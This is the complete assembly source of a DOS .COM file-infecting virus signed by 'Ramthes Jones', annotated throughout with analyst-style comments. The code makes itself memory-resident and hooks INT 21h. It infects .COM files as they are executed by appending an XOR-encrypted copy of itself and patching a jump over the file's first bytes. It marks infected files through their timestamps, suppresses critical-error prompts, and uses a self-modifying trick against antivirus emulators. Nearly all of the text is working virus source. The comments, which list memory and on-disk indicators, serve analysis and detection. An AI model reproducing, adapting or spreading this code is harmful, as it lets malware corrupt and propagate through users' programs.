;******************************************************************************
;******************************************************************************
;****		   Virus: .COM /noTBAV					   ****
;****					 By: Ramthes Jones		   ****
;******************************************************************************
;******************************************************************************
; All four segment registers are assumed to address CODE, and code starts at
; offset 0100h, i.e. the layout of a DOS .COM image.
CODE	SEGMENT

	ASSUME	CS:CODE, DS:CODE, ES:CODE, SS:CODE
	ORG	0100h

; DELTA = size in bytes of the self-replicating body (label ONE up to label TWO).
; It is the byte count used for the copy into resident memory (STAY_IN_MEMO)
; and for the block written to a target file (CONTI).
DELTA	EQU	(TWO - ONE)

; ---------------------------------------------------------------------------
; START: first-generation carrier program ("host") that the body is attached to.
; The first bytes at 0100h jump to the body. RUN_COM later overwrites the three
; bytes at 0100h with the contents of NORMAL (three NOPs in this source) and
; re-enters at 0100h, after which the code below prints MSG and terminates.
; NOTE(review): assumes the JMP plus any assembler padding is at least 3 bytes,
; so the restored bytes do not reach the MOV AH,09h -- confirm in a listing.
; ---------------------------------------------------------------------------
START:
	JMP	VIR_START
	NOP
	MOV	AH,09h				; DOS: print '$'-terminated string at DS:DX
	MOV	DX,OFFSET MSG
	PUSH	CS
	POP	DS				; DS = CS so that DS:DX addresses MSG
	INT	21h

	INT	20h				; DOS: terminate program

; Text shown by the carrier (Spanish): "Virus Mr-X activated!!!" /
; "Please do not run any file. Heh, heh, heh..."
MSG	DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
	DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'

; ---------------------------------------------------------------------------
; VIR_START / ONE: first byte of the replicated body, followed by a one-byte
; XOR decoding loop over the range (BEGIN - 1) .. TWO.
; Two immediates in this prologue are rewritten in every written copy by the
; code at CONTI: bytes 1-2 from ONE (operand of MOV BX) and byte 20 from ONE
; (operand of XOR AH). In this source the XOR operand is 00h, so the loop
; leaves the range unchanged.
; BX is pushed here and stays on the stack until RUN_COM pops it.
; Analyst note: the loop is self-modifying (see BUCLE), so a static listing
; and an emulated trace of this prologue can disagree.
; ---------------------------------------------------------------------------
VIR_START:
ONE	LABEL	BYTE
	MOV	BX,015Dh			; base offset of the body in memory (presumably the address of ONE in this image)
	PUSH	BX
	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1; Known value
	ADD	SI,BX				; SI -> first byte of the encoded range
	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1; Known value
	MOV	DX,0FFCDh			  ; FFCD = INT FFh
	CLI					; interrupts off for the duration of the loop
BUCLE:
	MOV	AH,[SI]
	XOR	AH,00h				; key byte; CONTI stores DL at offset 20 of each copy, presumably this operand
	DB	06 DUP (90h)			; six NOP bytes
	; Writes the bytes CD FF over [BX+30] just before execution reaches that
	; spot. NOTE(review): offset 30 from ONE appears to be the INTFFh label
	; below -- confirm against an assembler listing. Presumably the
	; anti-emulation measure the "/noTBAV" tag in the file header refers to:
	; an environment that executes the freshly written bytes takes INT FFh
	; instead of performing the store.
	MOV	[bx+30],DX

INTFFh	LABEL	WORD
	MOV	[SI],AH				; store the decoded byte
	MOV	[bx+30],2488h			; puts back bytes 88h 24h, the encoding of MOV [SI],AH
	INC	SI
	LOOP	BUCLE

	STI
	JMP	ATBV

; Terminates the process via INT 21h/AH=4Ch. No jump to JODER is visible in
; this file.
JODER:
	MOV	AH,4Ch
	INT	21h

ATBV:
	MOV	AH,30h				; DOS: get version; the result is not used by the visible code
	INT	21h

; ---------------------------------------------------------------------------
; BEGIN: residency handshake. INT 21h is called with AX=0ACACh; the resident
; handler (GIVE_MARK in HOOK_21) answers AX=0CACAh. A match means the resident
; copy is already installed and control goes straight to the host.
; Analyst note: the ACACh -> CACAh exchange on INT 21h is a concrete
; indicator that this handler is resident in memory.
; ---------------------------------------------------------------------------
BEGIN:
	MOV	AX,0ACACh
	INT	21h
	CMP	AX,0CACAh
	JE	RUN_COM
	JMP	STAY_IN_MEMO

; ---------------------------------------------------------------------------
; RUN_COM: restores the host's original first three bytes and runs it.
; Stack on entry: the BX value pushed at VIR_START (base offset of the body).
; ---------------------------------------------------------------------------
RUN_COM:
	PUSH	CS
	PUSH	CS
	POP	DS
	POP	ES				; DS = ES = CS
	POP	BX				; BX = body base offset saved at VIR_START
	MOV	DI,100h				; destination: start of the .COM image
	LEA	SI,[(NORMAL - OFFSET ONE) + BX]	; source: saved host bytes in NORMAL
	MOVSW
	MOVSB					; 2 + 1 = 3 bytes copied to 0100h
	PUSH	CS
	PUSH	0100h
	RETF					; far return to CS:0100h, i.e. the host entry point

; ---------------------------------------------------------------------------
; STAY_IN_MEMO: makes the body memory-resident and hooks INT 21h.
; Steps visible below: shrink the program's memory block, allocate a 60h
; paragraph block, change that block's owner field, copy DELTA bytes of the
; body to offset 0 of the new block, save the current INT 21h vector and point
; INT 21h at HOOK_21 inside the copy. Ends by jumping to RUN_COM.
; Because the copy sits at offset 0 of its segment, all resident references
; are written as (label - OFFSET ONE).
; Analyst note: after this runs, a memory map shows a 60h-paragraph block
; whose MCB owner word is 0008h and the INT 21h vector points into it.
; ---------------------------------------------------------------------------
STAY_IN_MEMO:
	MOV	AH,4Ah				; DOS: resize memory block at ES
	XOR	BX,BX				; requested size 0; purpose not evident from the visible code
	INT	21h

	MOV	AH,4Ah
	MOV	BX,0FFFFh			; oversized request; DOS is expected to fail and return the maximum size in BX
	INT	21h

	SUB	BX,61h	;101h
	MOV	AH,4Ah				; resize to (maximum - 61h) paragraphs, leaving room for the next allocation
	INT	21h

	MOV	AH,48h				; DOS: allocate memory
	MOV	BX,60h ;100h
	INT	21h

	MOV	ES,AX				; ES = segment of the new block
	PUSH	ES
	DEC	AX
	MOV	ES,AX				; paragraph before the block: its memory control block
	MOV	ES:WORD PTR [0001h], 0008h	; owner field := 0008h, so the block is not tied to this program's PSP
	POP	ES

	PUSH	CS
	POP	DS

	POP	SI				; SI = body base offset saved at VIR_START ...
	PUSH	SI				; ... kept on the stack for RUN_COM
	XOR	DI,DI
	MOV	CX,DELTA
	CLD
	REP	MOVSB				; copy body DS:SI -> ES:0000

	PUSH	ES
	POP	DS				; DS = resident segment

	MOV	AX,3521h			; DOS: get INT 21h vector -> ES:BX
	INT	21h
	POP	SI
	PUSH	SI
	MOV	DS:[INT21IP - OFFSET ONE],BX	; save original handler offset
	MOV	DS:[INT21CS - OFFSET ONE],ES	; save original handler segment

	MOV	AX,2521h			; DOS: set INT 21h vector to DS:DX
	MOV	DX,(OFFSET HOOK_21 - OFFSET ONE)
	INT	21h
	JMP	RUN_COM

; ---------------------------------------------------------------------------
; HOOK_21: resident INT 21h handler.
; Saves DS, flags and the general registers, then dispatches on AX:
;   4B00h (DOS load-and-execute) -> INFECT_COM
;   0ACACh (residency query)     -> GIVE_MARK
;   anything else                -> FIN (registers restored, original handler)
; ---------------------------------------------------------------------------
HOOK_21 PROC FAR
	PUSH	DS
	PUSHF
	PUSH	AX
	PUSH	BX
	PUSH	CX
	PUSH	DX
	PUSH	SI
	PUSH	DI
	PUSH	DS
	PUSH	ES

	CMP	AX,4B00h
	JE	INFECT_COM
	CMP	AX,0ACACh
	JE	GIVE_MARK
	JMP	FIN

; Answers the residency query: unwinds the saved registers in reverse push
; order and returns AX=0CACAh directly to the caller without chaining to DOS.
GIVE_MARK:
	POP	ES
	POP	DS
	POP	DI
	POP	SI
	POP	DX
	POP	CX
	POP	BX
	POP	AX
	POPF
	POP	DS
	MOV	AX,0CACAh
	IRET

; ---------------------------------------------------------------------------
; INFECT_COM: reached from HOOK_21 when a program is about to be executed
; (AX=4B00h). DS:DX is taken to be the caller's file name pointer.
; Every DOS call below is made as PUSHF + far CALL through the saved vector
; INT21IP:INT21CS, i.e. directly to the previous INT 21h handler rather than
; through the hooked interrupt.
; This part: install a temporary INT 24h handler, save and change the file
; attributes, open the file, read its first two bytes and skip files that
; begin with the MZ executable signature.
; ---------------------------------------------------------------------------
INFECT_COM:
	PUSH	AX
	PUSH	BX
	PUSH	DX
	PUSH	DS
	PUSH	ES

	MOV	AX, CS
	MOV	DS, AX				; DS = resident segment
	MOV	AX,3524h			; DOS: get INT 24h (critical error) vector -> ES:BX
	PUSHF
	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
	MOV	DS:[INT24IP - OFFSET ONE],BX	; saved so FINAL can restore it
	MOV	DS:[INT24CS - OFFSET ONE],ES

	MOV	AX,2524h			; DOS: set INT 24h vector to DS:DX (HOOK_24)
	MOV	DX,(OFFSET HOOK_24 - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
	POP	ES
	POP	DS
	POP	DX
	POP	BX
	POP	AX

	PUSH	DX				; file name offset, popped again at FINAL

	MOV	AX,4300h			; DOS: get file attributes -> CX
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	CS:[(ATRIBUTOS - OFFSET ONE)],CX	; remember original attributes

	MOV	AX,4301h			; DOS: set file attributes
	MOV	CX,20h				; archive bit only (read-only/hidden/system cleared)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	JC	FINAL_1

	MOV	AX,3D02h			; DOS: open file, read/write access
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	PUSH	AX
	POP	BX				; BX = file handle

	MOV	AH,3Fh				; DOS: read CX bytes into DS:DX
	MOV	CX,2
	PUSH	CS
	POP	DS
	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	XOR	SI,SI
	mov	ax,cs:(normal - offset one)[si]
	cmp	ax,'ZM'				; word constant whose bytes in the file are 'M','Z'
	je	final_1				; MZ-format executable: left untouched
	jmp	conti

; Relay for conditional jumps whose target FINAL is out of short-jump range.
FINAL_1:
	JMP	FINAL

; ---------------------------------------------------------------------------
; CONTI: continuation of INFECT_COM for files that do not start with "MZ".
; BX = open file handle. Sequence visible below:
;   1. read the file time stamp; a seconds field of 0Dh (26 s) is treated as
;      the "already processed" marker and ends the routine;
;   2. save the file's first 3 bytes in NORMAL;
;   3. build BUFFER = E9h + (file length - 3), a near JMP from 0100h to the
;      end of the file;
;   4. copy the body to a scratch block, patch its MOV BX operand and key
;      byte, XOR the range (BEGIN - 1) .. TWO with the key, append it;
;   5. write BUFFER over the first 3 bytes and stamp the seconds field 0Dh.
; Analyst note: resulting on-disk indicators are a .COM file that starts with
; E9h pointing DELTA bytes before end of file, and a time stamp whose seconds
; read 26. The key is a single byte, so the appended range is byte-wise XOR
; of the plain body.
; ---------------------------------------------------------------------------
CONTI:
	MOV	AX,5700h			; DOS: get file time (CX) and date (DX)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	CS:[(HORA - OFFSET ONE)],CX
	MOV	CS:[(FECHA - OFFSET ONE)],DX

	AND	CL,00011111b	; This is the correct way to check
	CMP	CL,00001101b	;  whether the seconds are 26
	JE	FINAL_1

	XOR	AL,AL				; origin 0: seek to start of file
	CALL	F_42h

	MOV	AH,3Fh				; DOS: read 3 bytes into NORMAL
	MOV	CX,3
	PUSH	CS
	POP	DS
	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AL,02h				; origin 2: seek to end; AX = low word of file length
	CALL	F_42h
	PUSH	AX				; file length, used again below

	SUB	AX,3				; displacement for a 3-byte near JMP placed at 0100h

	MOV	SI,1
	MOV	CS:(BUFFER - OFFSET ONE)[SI],AL	; BUFFER[1] = displacement low byte
	INC	SI
	MOV	CS:(BUFFER - OFFSET ONE)[SI],AH	; BUFFER[2] = displacement high byte (BUFFER[0] stays E9h)

	PUSH	BX				; keep the file handle across the allocation
	MOV	AH,48h				; DOS: allocate 150h paragraphs as scratch space
	MOV	BX,150h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	ES,AX				; ES = scratch segment
	POP	BX

	PUSH	CS
	POP	DS

	XOR	SI,SI
	MOV	DI,SI
	MOV	CX,OFFSET TWO - OFFSET ONE
	CLD
	REP	MOVSB				; scratch copy of the resident body, CS:0 -> ES:0

	PUSH	ES
	POP	DS				; DS = scratch segment

	POP	AX			; Compute
	INC	AH			; the address
	XOR	SI,SI			; where the
	MOV	[SI + 1],AL		; infected file
	MOV	[SI + 2],AH		; will start
	; i.e. file length + 0100h is written into bytes 1-2 of the copy, the
	; operand of MOV BX at ONE.

	MOV	AH,2Ch				; DOS: get system time; DL = hundredths of a second
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	[SI+20],DL			; key byte stored at offset 20 of the copy (presumably the XOR AH operand at BUCLE)

	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1
	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
	XOR	ES:[SI],DL			; same range and key the prologue loop at BUCLE processes
	INC	SI
	LOOP	ENCRIPTO

	MOV	AH,40h				; DOS: write DELTA bytes from DS:0000 at the current file position
	MOV	CX,DELTA
	XOR	DX,DX
	PUSH	ES
	POP	DS
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	JC	FINAL

	MOV	AH,49h				; DOS: free the scratch block at ES
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	XOR	AL,AL				; seek back to start of file
	CALL	F_42h

	MOV	AH,40h				; DOS: write the 3-byte JMP from BUFFER over the file's first bytes
	MOV	CX,3
	MOV	DX,(OFFSET BUFFER - OFFSET ONE)
	PUSH	CS
	POP	DS
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,5701h			; DOS: set file time/date
	MOV	CX,CS:[(HORA - OFFSET ONE)]
	AND	CL,11100000b			; clear the seconds field ...
	OR	CL,00001101b			; ... and set it to 0Dh (the marker tested at CONTI)
	MOV	DX,CS:[(FECHA - OFFSET ONE)]	; original date kept
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
; ---------------------------------------------------------------------------
; FINAL: common exit of INFECT_COM. Closes the handle in BX, writes back the
; attributes saved in ATRIBUTOS and restores the INT 24h vector saved in
; INT24IP:INT24CS, then falls into FIN.
; ---------------------------------------------------------------------------
FINAL:
	MOV	AH,3Eh				; DOS: close file handle BX
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,4301h			; DOS: set file attributes
	MOV	CX,CS:[(ATRIBUTOS - OFFSET ONE)]
	POP	DX				; file name offset pushed in INFECT_COM
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,2524h			; DOS: set INT 24h vector back to the saved DS:DX
	MOV	DX,CS:[INT24IP - OFFSET ONE]
	MOV	DS,CS:[INT24CS - OFFSET ONE]
	PUSHF
	CALL	DWORD PTR CS:[INT21IP-OFFSET ONE]

; FIN: restores the registers saved at HOOK_21 entry (reverse push order) and
; hands the original request to the previous INT 21h handler with a far JMP,
; so that handler's IRET returns to the original caller.
FIN:
	POP	ES
	POP	DS
	POP	DI
	POP	SI
	POP	DX
	POP	CX
	POP	BX
	POP	AX

	POPF
	POP	DS
	JMP	DWORD PTR CS:[(INT21IP - OFFSET ONE)]

; ---------------------------------------------------------------------------
; F_42h: file seek helper (DOS INT 21h/AH=42h) called through the saved
; INT 21h vector.
; In:    AL = seek origin (the visible callers pass 0 = start, 2 = end)
;        BX = file handle
; Out:   whatever the DOS call returns (the caller at CONTI uses AX as the
;        low word of the new position)
; Clobb: AH, CX, DX
; The offset CX:DX comes from CWD: with AH=42h, AX is non-negative, so DX and
; then CX become 0 and the seek lands exactly on the origin.
; ---------------------------------------------------------------------------
F_42h	PROC
	MOV	AH,42h
	CWD
	MOV	CX,DX
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	RET
F_42h	ENDP

; End of the INT 21h handler procedure opened at HOOK_21 PROC FAR.
HOOK_21 ENDP

; ---------------------------------------------------------------------------
; HOOK_24: temporary INT 24h (DOS critical error) handler, installed by
; INFECT_COM and removed again at FINAL. It returns AL=0 immediately, so a
; critical error raised while it is installed (for example a write to a
; write-protected disk) does not reach the default handler's prompt.
; Analyst note: the practical effect is that failed writes during the file
; modification stay silent for the user.
; ---------------------------------------------------------------------------
HOOK_24 PROC
	XOR	AL,AL
	IRET
HOOK_24 ENDP

; ---------------------------------------------------------------------------
; Data area of the body. Everything up to TWO is part of the DELTA bytes that
; are copied and written, and lies inside the range XORed at ENCRIPTO.
; Resident code addresses these as (label - OFFSET ONE).
; ---------------------------------------------------------------------------
INT21IP 	DW 0			; previous INT 21h handler, offset (far pointer low word)
INT21CS 	DW 0			; previous INT 21h handler, segment
INT24IP 	DW 0			; previous INT 24h handler, offset
INT24CS 	DW 0			; previous INT 24h handler, segment
INT17IP 	DW 0			; not referenced anywhere in this file
INT17CS 	DW 0			; not referenced anywhere in this file
ATRIBUTOS	DW 0			; original attributes of the file being processed
HORA		DW 0			; original DOS time word of that file
FECHA		DW 0			; original DOS date word of that file
BUFFER		DB 3 DUP(0E9h)		; 3-byte near JMP written to the start of the file; bytes 1-2 filled in at CONTI
NORMAL		DB 3 DUP(90h)		; host's original first 3 bytes (three NOPs for the first-generation carrier)
; Author signature. Analyst note: it sits inside the XORed range, so it shows
; up as plain text in a file only when that copy's key byte is 00h.
HIDDEN_MSG	DB "Ramthes. World Cup'98: ARGENTINA!!"
TWO	LABEL	BYTE			; end marker of the body (see DELTA)
CODE	ENDS
        END     START